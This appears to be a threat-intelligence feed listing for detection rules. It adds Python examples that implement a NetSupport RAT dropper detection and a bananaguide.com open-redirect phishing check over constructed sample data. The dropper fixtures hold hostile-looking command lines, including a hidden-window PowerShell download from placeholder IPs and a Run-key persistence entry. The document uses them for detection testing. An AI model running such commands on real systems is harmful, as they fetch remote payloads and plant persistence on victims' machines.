Description:
Premium feed that expands the "Detection Rules Pro" feed with analysis and guidance. It adds rule change analysis with impact guidance, correlation of rules to active CVEs and threat campaigns, and a weekly detection engineering brief, all intended to support strategic decision-making, prioritization of effort, and a robust, proactive detection posture. It is best suited to mature security operations centers, threat intelligence teams, and detection engineers who need this additional context.
Contents:
- Identity: 39
- Indicator: 7996
- Note: 7076
- Directory: 3608
- Domain-Name: 1075
- Email-Addr: 28
- File: 4567
- Ipv4-Addr: 54
- Ipv6-Addr: 12
- Process: 6557
- Relationship: 26421
- Windows-Registry-Key: 844
Application:
- Risk-based prioritization - focus your team's efforts on deploying and tuning detections that address the most current and impactful threats.
- Improved situational awareness - gain a deeper understanding of how community detections align with the evolving threat landscape, active vulnerabilities, and adversary TTPs.
- Proactive detection posture management - move beyond reactive alerting to strategically curating and maintaining your detection capabilities based on actionable intelligence.
- Reduced fatigue and improved resource allocation - maximize the impact of your detection engineering with decision support drawn from tactical and strategic intelligence about the threat detection landscape.
STIX/TAXII endpoints:
Content preview:

Latest 10 entities:
- Obfuscated BAT Dropper Delivers NetSupport RAT (ANY.RUN, KQL, new rule): This KQL query detects the execution of an obfuscated BAT dropper that delivers the NetSupport RAT. It identifies instances where cmd.exe launches a .bat file, which in turn executes PowerShell with a hidden window style and Invoke-WebRequest, followed by a registry modification that adds client32.exe to the Run key. Relevant MITRE ATT&CK tactics: TA0005, TA0003. Relevant MITRE ATT&CK techniques: T1059.003, T1566.001, T1547.001. Labels: malicious-activity.
- Open Redirect: bananaguide.com (Sublime-Security, new rule): This rule detects the use of the bananaguide.com redirect with a URL parameter in messages, which has been exploited in the wild. The rule checks inbound messages for links where the domain is bananaguide.com, the path is /thru.php, and the URL parameter is present and does not redirect back to bananaguide.com. It negates trusted sender domains unless they fail DMARC authentication and excludes messages sent from bananaguide.com. Relevant MITRE ATT&CK tactics: TA0001, TA0009. Relevant MITRE ATT&CK techniques: T1598, T1189, T1204, T1566. Labels: credential-access, malicious-activity.
- Credential phishing: Email delivery failure impersonation (Sublime-Security, new rule): This rule detects phishing emails that impersonate email system notifications about delivery failures or other mail system issues. It identifies emails that ask users to take action to "fix" or "recover" their email functionality, which typically leads to a credential harvesting portal. The rule analyzes email content, sender information, and links to identify potential phishing attempts. Relevant MITRE ATT&CK tactics: TA0001, TA0006. Relevant MITRE ATT&CK techniques: T1566, T1566.002, T1598, T1598.007. Labels: credential-access, phishing.
- file--0c1f67c1-3818-5514-b383-c56c23bb50aa
- process--c4988bad-df6a-4661-9a3b-a272f1efb204
- windows-registry-key--6879fcd9-ca48-558a-90a0-ce718860f913
- domain-name--a55309c3-ab50-531c-a66c-adf04038bdb9
- domain-name--2d8f3d77-dc85-5b86-90c1-bc48e6f8eb2d
- relationship--249ecb88-e876-49a8-8648-1b7688fb578c
- relationship--dc0b0799-1c5a-421b-869e-bb7c701d293c
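The NetSupport RAT dropper entry above describes a three-stage chain (cmd.exe launching a .bat, the .bat spawning hidden PowerShell with Invoke-WebRequest, then a Run-key write pointing at client32.exe). The KQL itself is not on this page; the following is an added Python example, not the ANY.RUN rule or any feed content, that implements the same chain logic over constructed process and registry events so you can see how the stages correlate. The event field names, the 300-second window, and the sample telemetry (including the documentation-range IPs) are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not data from the feed). WS01 shows the full
# chain the rule describes; WS02 shows only a hidden PowerShell download, which
# on its own should not fire the chained detection.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "host": "WS01", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\invoice.bat"'},
    {"ts": "2024-05-01T10:00:02", "host": "WS01", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -c \"Invoke-WebRequest "
                "http://198.51.100.7/c.zip -OutFile $env:TEMP\\c.zip\""},
    {"ts": "2024-05-01T10:00:09", "host": "WS01", "type": "registry",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Update",
     "data": r"C:\Users\u\AppData\Roaming\NS\client32.exe"},
    {"ts": "2024-05-01T11:30:00", "host": "WS02", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"iwr http://203.0.113.9/a.txt -OutFile a.txt\""},
]


def stage_bat_launch(e):
    """Stage 1: cmd.exe launching a .bat file (the dropper)."""
    return (e["type"] == "process"
            and e["image"].lower().endswith("\\cmd.exe")
            and ".bat" in e["cmdline"].lower())


def stage_hidden_download(e):
    """Stage 2: cmd.exe spawning PowerShell with a hidden window and Invoke-WebRequest/iwr."""
    if e["type"] != "process" or not e["image"].lower().endswith("\\powershell.exe"):
        return False
    if not e["parent"].lower().endswith("\\cmd.exe"):
        return False
    c = e["cmdline"].lower()
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", c) is not None  # -WindowStyle Hidden or -w hidden
    download = "invoke-webrequest" in c or re.search(r"\biwr\b", c) is not None
    return hidden and download


def stage_run_key_client32(e):
    """Stage 3: Run-key persistence whose data points at client32.exe (the NetSupport client)."""
    return (e["type"] == "registry"
            and e["key"].lower().endswith("\\currentversion\\run")
            and "client32.exe" in e["data"].lower())


def detect(events, window_seconds=300):
    """Return one alert per host where the three stages occur in order within the window."""
    alerts = []
    by_host = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(e["host"], []).append(e)
    for host, evs in by_host.items():
        for i, bat in enumerate(evs):
            if not stage_bat_launch(bat):
                continue
            deadline = datetime.fromisoformat(bat["ts"]) + timedelta(seconds=window_seconds)
            later = [x for x in evs[i + 1:] if datetime.fromisoformat(x["ts"]) <= deadline]
            ps = next((x for x in later if stage_hidden_download(x)), None)
            if ps is None:
                continue
            # The registry write must follow the download stage, not merely the .bat launch.
            reg = next((x for x in later if stage_run_key_client32(x) and x["ts"] >= ps["ts"]), None)
            if reg is None:
                continue
            alerts.append({"host": host, "dropper": bat["cmdline"],
                           "download": ps["cmdline"], "persistence": reg["data"]})
            break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Each stage fires on its own fairly often (hidden PowerShell downloads are common in admin tooling), so the value of the rule is the ordered correlation within a window; shrinking the window to a few seconds drops the WS01 alert because the Run-key write lands nine seconds after the dropper started.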
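The bananaguide.com open-redirect entry spells out the link and sender conditions but not the rule body. Below is an added Python example, not Sublime Security's rule or any feed content, that applies those conditions to constructed messages: a link on bananaguide.com with path /thru.php whose redirect parameter points off-domain, skipped when the sender is bananaguide.com itself or a trusted sender domain that passes DMARC. The parameter name `url`, the message field names, the trusted-domain allowlist, and the sample messages are assumptions made for the example.

```python
from urllib.parse import urlparse, parse_qs

REDIRECT_HOST = "bananaguide.com"
REDIRECT_PATH = "/thru.php"
REDIRECT_PARAM = "url"  # assumed name of the redirect target parameter
# Constructed allowlist standing in for an organisation's trusted sender domains.
TRUSTED_SENDER_DOMAINS = {"partner.example"}


def _host(url):
    return (urlparse(url).hostname or "").lower()


def is_abused_redirect(link):
    """True for bananaguide.com/thru.php?url=... where the target is an external host."""
    parts = urlparse(link)
    if _host(link) != REDIRECT_HOST or parts.path != REDIRECT_PATH:
        return False
    # parse_qs percent-decodes the value, so an encoded target still resolves.
    for target in parse_qs(parts.query).get(REDIRECT_PARAM, []):
        th = _host(target)
        # A target without a scheme yields no hostname and is ignored here.
        if th and th != REDIRECT_HOST and not th.endswith("." + REDIRECT_HOST):
            return True
    return False


def matches(msg):
    """Apply the message-level conditions described in the listing."""
    if msg["direction"] != "inbound":
        return False
    sender = msg["sender_domain"].lower()
    if sender == REDIRECT_HOST:
        return False
    if sender in TRUSTED_SENDER_DOMAINS and msg["dmarc"] == "pass":
        return False
    return any(is_abused_redirect(link) for link in msg["links"])


# Constructed sample messages (not data from the feed).
SAMPLE_MESSAGES = [
    {"id": "m1", "direction": "inbound", "sender_domain": "mailer.example", "dmarc": "pass",
     "links": ["https://bananaguide.com/thru.php?url=https%3A%2F%2Flogin-verify.example%2Fauth"]},
    {"id": "m2", "direction": "inbound", "sender_domain": "mailer.example", "dmarc": "pass",
     "links": ["https://bananaguide.com/thru.php?url=https://www.bananaguide.com/guide"]},
    {"id": "m3", "direction": "inbound", "sender_domain": "partner.example", "dmarc": "pass",
     "links": ["https://bananaguide.com/thru.php?url=https://login-verify.example/auth"]},
    {"id": "m4", "direction": "inbound", "sender_domain": "partner.example", "dmarc": "fail",
     "links": ["https://bananaguide.com/thru.php?url=https://login-verify.example/auth"]},
    {"id": "m5", "direction": "inbound", "sender_domain": "bananaguide.com", "dmarc": "pass",
     "links": ["https://bananaguide.com/thru.php?url=https://login-verify.example/auth"]},
    {"id": "m6", "direction": "outbound", "sender_domain": "corp.example", "dmarc": "pass",
     "links": ["https://bananaguide.com/thru.php?url=https://login-verify.example/auth"]},
]


def flag(messages):
    """IDs of messages the rule logic would flag."""
    return [m["id"] for m in messages if matches(m)]


if __name__ == "__main__":
    print(flag(SAMPLE_MESSAGES))
```

Only m1 (external target, percent-encoded) and m4 (trusted sender that failed DMARC, so the allowlist does not apply) are flagged; the redirect back to a bananaguide.com host, the DMARC-passing trusted sender, the message from bananaguide.com itself, and the outbound message all fall through.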